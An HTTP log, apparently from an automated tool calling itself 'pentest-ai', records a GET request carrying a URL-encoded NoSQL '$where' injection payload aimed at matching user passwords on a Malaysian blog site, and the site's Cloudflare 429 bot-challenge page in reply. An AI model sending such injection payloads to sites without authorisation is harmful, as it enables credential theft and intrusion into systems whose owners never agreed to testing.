REQUEST:
GET https://my.myfirst.tech/blogs/latest/cara-buat-duit-online-malaysia-5-kaedah-yang-ramai-tak-tahu/api/users/find?email=%5B%24where%5D%3Dthis.password.match%28%2F.%2A%2F%29
User-Agent: pentest-ai/0.11 (+https://pentestai.xyz)



RESPONSE:
HTTP 429
Date: Fri, 17 Jul 2026 09:30:58 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 9790
Connection: close
Accept-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cf-Mitigated: challenge
X-Frame-Options: SAMEORIGIN
Server: cloudflare
Critical-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=(),xr-spatial-tracking=*
Referrer-Policy: same-origin
Server-Timing: chlray;desc="a1c83b238978a110"
X-Content-Type-Options: nosniff
Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=f3mrl8%2Bk60bgeZu1CuT9vXnKn%2FIxAizsAwB8ebHuh%2Bi86Kyf%2FhekNZQH2xKYhPAmJNDqrD%2F4cZTbTSKZXw4cqrt%2BN1uRkYRwcuX7YiTexvCR%2BsXVIMUUe6BlVUQT%2FZqoPg%3D%3D"}]}
Nel: {"report_to":"cf-nel","success_fraction":0.01,"max_age":604800}
X-XSS-Protection: 1; mode=block
X-Permitted-Cross-Domain-Policies: none
X-Download-Options: noopen
CF-RAY: a1c83b238978a110-SIN
alt-svc: h3=":443"; ma=86400

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Verifying your connection...</title>

    <style type="text/css">
        *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#FFF;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}svg{width:40%}a:hover{border-bottom-color:#A9A9A9}h1{font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;align-items:start;margin-bottom:1.6rem;margin:auto}.action{border:1px solid #A9A9A9;padding:1.2rem 2.5rem;border-radius:6px;text-decoration:none;margin-top:1.6rem;display:inline-block;font-size:1.5rem;transition:border-color 0.2s ease-in}.action:hover{border-color:#000}@media all and (min-width:500px){.text-container--main{align-items:start}.page{padding:7.5rem 10.5rem}}
    </style>
<meta http-equiv="refresh" content="360"></head>

<body>
  <div class="page">
    <div class="text-container text-container--main">
      <div>
        <h1 data-i18n="content-title">Your connection needs to be verified before you can proceed</h1>
        <div class="cf-injected-html"><div class="main-wrapper" role="main"><div class="main-content"><noscript><div class="h2"><span id="challenge-error-text">Enable JavaScript and cookies to continue</span></div></noscript></div></div><script>(function(){window._cf_chl_opt = {cFPWv: 'b',cH: 'tI0sFp9PiBonfAS__EYVyLqjzcghLRBjq.RqBWqn9No-1784280658-1.2.1.1-7gjD8OZbawiveNP7wXrOZv6biASZuNBsuFYbnZJvKkbZzFfm6UnvjKHiGrI77VGB',cITimeS: '1784280658',cRay: 'a1c83b238978a110',cTplB: '0',cTplC:1,cTplO:0,cTplV:5,cType: 'managed',cUPMDTk:"/blogs/latest/cara-buat-duit-online-malaysia-5-kaedah-yang-ramai-tak-tahu/api/users/find?email=%5B%24where%5D%3Dthis.password.match%28%2F.*%2F%29\u0026__cf_chl_tk=F6UoxRHlIzfsPQTF3YMMrREYS_3Ddi3iSjQT7LlWXMY-1784280658-1.0.1.1-Zz2cxfk205hTrO8RyPWzOJMf1hZWv9.VI9m4zVuyvMQ",cvId: '3',cZone: 'my.myfirst.tech',fa:"/blogs/latest/cara-buat-duit-online-malaysia-5-kaedah-yang-ramai-tak-tahu/api/users/find?email=%5B%24where%5D%3Dthis.password.match%28%2F.*%2F%29\u0026__cf_chl_f_tk=F6UoxRHlIzfsPQTF3YMMrREYS_3Ddi3iSjQT7LlWXMY-1784280658-1.0.1.1-Zz2cxfk205hTrO8RyPWzOJMf1hZWv9.VI9m4zVuyvMQ",md: 'fc5hFsT5iXcSynGr6OxfG9YM0.Jv_hDUx2PRF0UdzxA-1784280658-1.2.1.1-dR3sjvnR4A.H.D4PwA26eUjBpWuFBdE16qd8Dmdu6Evta6cnoZmOAstRmcJmwP7iHTlo2C_X5hcL92IhorBBK18AiQr9bO0SV8k3vrhHQ2VbiYLfJfG.zw9g.BlU9sR_OB5YxzkZD.IqXwpxJSQT6Y_QtR2MWnMxf2NNN8gJS6aofq8yQumRyUUHUmfTQF9Dhcj.R1ONyRkXMWTa4_4ZaV_bclBVUIVVYDpAuI86C.OOk6RU5vFCBM9tbIyNXTEJX62zYXmAB0.ViB4Ax_gjayuLzUKqCjUpyAnoYzQCNSCRFdJQM4y5gSuVioZqakyMxCy9Fy1TsMVdd5BdvwOeIqudwUw9mqBo.Wni40J0lprGX0lzagJenWDSPpL9wVk8cBov5geCZwtZ3DRfMhEvlN23BUZNQifuAwiDvN.XoHHHEhdwZ1PgkunFfjHyzJt4hN2XTdP5JCaVLnB2.mp6WScaeoNVtHEGQKHV0udTqQcBoOxPRn73_vfF7p1EB9q22RJ2wKCyQ5z1ltUsfBIBk9aMg.zLAbF9yh.vy6EOLRLehQdHSZXfLAVBsauiBqFaOGtoADLXIEff18eNcKxWwVENwYkhP0PWFJKYPH7TdpddAopfZMuLm3n.nAxB.udNHj0hOi72FVz0gp2QjjI0nUJP3ZrjoHvYtKfwwEpDpkSdbhkbSJHBC9.x1Qt7JknPMCDLDl_o_4P0eqhRIKVu9xtwvpFr5p5YQJzSKaOUldZC5KIl8mk36MSGIXQvZTPgrKkKgERIfctbmN20JuWma0GK2TrNeAgz0I72cCJT08e4bTsNDEjcfTxBM77uOxNa_LtK5g0cfOaAxRpFeN8VPbY0O4R1MZYQ0yPC4sFl4qoy3Y5x3FH4D4UDo6..EJAOUk9u_9AckjoRF4DvQaRtyXNSsvUkvjy7ejtajGB4gAFmH7LJjYeF8onuZKVJvLcy.NIbHzABKiWgC5WfIDy.z.suuzQtRAFRbsuE3Rap5zE3vikr5NlUG4q3Fyzw0b4ivzGBGfIxL7t8uHC1_U1pVl1KecYsJ.S9G785PeQCNgsmcKwM5xNMJGfEUXGsyG4YwRrwkabcRZIHruySquSn6RQ9iVxs.1vGExqMRWOwyw1TQpYhWnf9_aCTOktZRiItYAIjHqEh1Nzw80Ku4vKFPU2NmfD5t0lrQjlhDOBQP3mw6BwSVx0YOG.OTEEpWtG_R0f3aeyhqfS8NL6facRu_eBa4nBDCmht.OhCI3C4EJmVoXre1TwDRXE5Njl0z7aRt_iTrM.5ZCmgoN9eBssGIpFLnCw9JLNqb.JeAb27ZW1JO6jObZAMi_GshXyiF0QY',mdrd: '.vWIZVQ.aby7Kf4BQ9cksixCTeJdzI_ZIzog.x7BcTU-1784280658-1.2.1.1-_f032cwRj20.WgWfSop5IJ0CWkav1IWu0sIXFZAKv7NB5QMNNBrK.eYmlIBP0.G2mud2KinUHnzRByfjYenkSgOgA1dVDzo_bz8P90v1DUL.1TzPNMCjdsaTsUwMDusOEaoAyxQZ7beQDwKgIM6aQq_Xq26358QudhLARc_9A2L2tvLgdCAlUpSgwVsGDHDfNGurV.6PRY50ZPyAu9vg2MobxZsQkIA.ZhuMHYXwwc.IOby1YDyf7kDO0ugYeDLr',};var a = document.createElement('script');a.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=a1c83b238978a110';window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;if (window.history && window.history.replaceState) {var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;history.replaceState(null, null,"/blogs/latest/cara-buat-duit-online-malaysia-5-kaedah-yang-ramai-tak-tahu/api/users/find?email=%5B%24where%5D%3Dthis.password.match%28%2F.*%2F%29\u0026__cf_chl_rt_tk=F6UoxRHlIzfsPQTF3YMMrREYS_3Ddi3iSjQT7LlWXMY-1784280658-1.0.1.1-Zz2cxfk205hTrO8RyPWzOJMf1hZWv9.VI9m4zVuyvMQ"+ window._cf_chl_opt.cOgUHash);a.onload = function() {history.replaceState(null, null, ogU);}}document.getElementsByTagName('head')[0].appendChild(a);}());</script></div>
      </div>
    </div>
  </div>

  <script>
    var t = {
  "cs": {
    "title": "Vaše připojení se ověřuje...",
    "content-title": "Než budete moct pokračovat, je nutné ověřit vaše připojení"
  },
  "da": {
    "title": "Bekræfter din forbindelse ...",
    "content-title": "Din forbindelse skal bekræftes, før du kan fortsætte"
  },
  "de": {
    "title": "Deine Verbindung wird verifiziert ...",
    "content-title": "Deine Verbindung muss verifiziert werden, bevor du fortfahren kannst"
  },
  "en": {
    "title": "Verifying your connection...",
    "content-title": "Your connection needs to be verified before you can proceed"
  },
  "es": {
    "title": "Verificando la conexión...",
    "content-title": "Se debe verificar tu conexión antes de poder continuar"
  },
  "fi": {
    "title": "Yhteyttäsi todennetaan...",
    "content-title": "Yhteytesi on todennettava ennen kuin voit jatkaa"
  },
  "fr": {
    "title": "Connexion en cours de vérification...",
    "content-title": "Votre connexion doit être vérifiée avant que vous puissiez continuer"
  },
  "hi": {
    "title": "आपका कनेक्शन वेरिफ़ाई हो रहा है...",
    "content-title": "इससे पहले कि आप आगे बढ़ें आपके कनेक्शन को वेरिफ़ाई करना होगा"
  },
  "it": {
    "title": "Verifica connessione...",
    "content-title": "È necessario verificare la tua connessione prima di procedere"
  },
  "ja": {
    "title": "接続を確認しています...",
    "content-title": "続行するには接続の確認が必要です"
  },
  "ko": {
    "title": "연결 확인 중...",
    "content-title": "계속 진행하려면 연결을 확인해야 합니다."
  },
  "ms": {
    "title": "Mengesahkan sambungan anda...",
    "content-title": "Sambungan anda perlu disahkan sebelum anda boleh meneruskan"
  },
  "nb": {
    "title": "Bekreft tilkoblingen din …",
    "content-title": "Tilkoblingen din må bekreftes før du kan fortsette"
  },
  "nl": {
    "title": "Je verbinding verifiëren...",
    "content-title": "Verifieer eerst je verbinding voordat je doorgaat"
  },
  "pl": {
    "title": "Weryfikowanie połączenia...",
    "content-title": "Możesz kontynuować, dopiero gdy połączenie zostanie zweryfikowane"
  },
  "pt-BR": {
    "title": "Verificando a conexão...",
    "content-title": "A conexão precisa ser verificada para você prosseguir"
  },
  "pt-PT": {
    "title": "A verificar a sua ligação...",
    "content-title": "A sua ligação tem de ser verificada antes de prosseguir"
  },
  "sv": {
    "title": "Verifierar din anslutning ...",
    "content-title": "Din anslutning måste verifieras innan du kan fortsätta"
  },
  "th": {
    "title": "ตรวจสอบยืนยันการเชื่อมต่อของคุณ...",
    "content-title": "การเชื่อมต่อของคุณต้องได้รับการตรวจสอบยืนยันก่อนจึงจะดำเนินการต่อได้"
  },
  "tr": {
    "title": "Bağlantınız doğrulanıyor...",
    "content-title": "Devam etmeden önce bağlantınızın doğrulanması gerekir."
  },
  "vi": {
    "title": "Đang xác minh kết nối...",
    "content-title": "Bạn cần xác minh kết nối để có thế tiếp tục"
  },
  "zh-CN": {
    "title": "正在验证您的连接...",
    "content-title": "您的连接需要经过验证然后您才能继续操作"
  },
  "zh-TW": {
    "title": "正在驗證連線...",
    "content-title": "您必須先驗證連線才能繼續"
  }
};
    var language = navigator.languages && navigator.languages[0] || // Chrome / Firefox
      navigator.language ||   // All browsers
      navigator.userLanguage || // IE <= 10
      "en";
    language = language.split("-")[0]; // Strip country code
    translations = t[language] || t["en"];
    // Replace content on screen
    for (var id in translations) {
      target = document.querySelector("[data-i18n=" + id + "]");
      if (target != undefined) {
        target.innerHTML = translations[id];
      }
    }
    // Replace title tage
    document.title = translations["title"];
    // Replace language tag
    if (t[language]) { document.getElementsByTagName('html')[0].setAttribute('lang', language); };
  </script>
</body>
</html>
